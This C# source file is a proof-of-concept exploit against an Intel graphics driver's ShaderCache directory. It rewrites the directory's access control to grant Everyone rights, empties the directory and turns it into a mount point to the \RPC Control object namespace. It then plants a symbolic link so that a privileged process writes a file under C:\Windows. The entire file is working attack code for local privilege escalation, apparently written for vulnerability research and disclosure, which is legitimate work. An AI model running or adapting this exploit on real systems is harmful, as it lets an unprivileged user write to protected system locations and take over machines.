﻿using NtApiDotNet;
using System;
using System.IO;

namespace POC
{
    class Program
    {
        // Tested on driver version 25.20.100.6472
        static string GetShaderCachePath()
        {
            return Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData), 
                "Intel", "ShaderCache");
        }

        static void SetSecurityDescriptor(string path, string sddl)
        {
            using (var file = NtFile.Open(NtFileUtils.DosFileNameToNt(path), null, FileAccessRights.WriteDac))
            {
                file.SetSecurityDescriptor(new SecurityDescriptor(sddl), SecurityInformation.Dacl);
            }
        }

        static void SetMountPoint(string path, string target)
        {
            using (var file = NtFile.Open(NtFileUtils.DosFileNameToNt(path), null, FileAccessRights.WriteAttributes))
            {
                file.SetMountPoint(target, string.Empty);
            }
        }

        static bool DeleteFile(string path)
        {
            using (var file = NtFile.Open(NtFileUtils.DosFileNameToNt(path), null, 
                FileAccessRights.Delete, FileShareMode.Delete, FileOpenOptions.OpenReparsePoint, false))
            {
                if (!file.IsSuccess)
                {
                    Console.WriteLine("Failed to open {0} - {1}", path, file.Status);
                    return false;
                }
                return file.Result.Delete(false).IsSuccess();
            }
        }

        static void Main(string[] args)
        {
            try
            {
                string shader_cache = GetShaderCachePath();
                if (!Directory.Exists(shader_cache))
                {
                    Console.WriteLine("Can't find shared cache directory, are you running on a correct system?");
                    return;
                }

                SetSecurityDescriptor(shader_cache, "D:(A;;0x1F01C9;;;WD)");
                bool empty_dir = true;
                foreach (var entry in Directory.GetFiles(shader_cache))
                {
                    if (!DeleteFile(entry))
                    {
                        Console.WriteLine("Couldn't delete {0}", entry);
                        SetSecurityDescriptor(entry, "D:(A;;0x1F0080;;;WD)");
                        empty_dir = false;
                    }
                }

                if (empty_dir)
                {
                    string target = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Windows), "test.txt");
                    Console.WriteLine("Directory is empty, setting target.");
                    SetMountPoint(shader_cache, @"\RPC Control");
                    using (var link = NtSymbolicLink.Create(@"\RPC Control\consent_1", 
                        NtFileUtils.DosFileNameToNt(target)))
                    {
                        new MainForm().ShowDialog();
                    }

                    if (!File.Exists(target))
                    {
                        Console.WriteLine("Target file doesn't exist");
                    }
                    else
                    {
                        File.WriteAllText(target, "Testing\n");
                        Console.WriteLine("Written to {0}", target);
                    }

                    DeleteFile(shader_cache);
                }
                else
                {
                    Console.WriteLine("Directory not empty, please restart and try again");
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
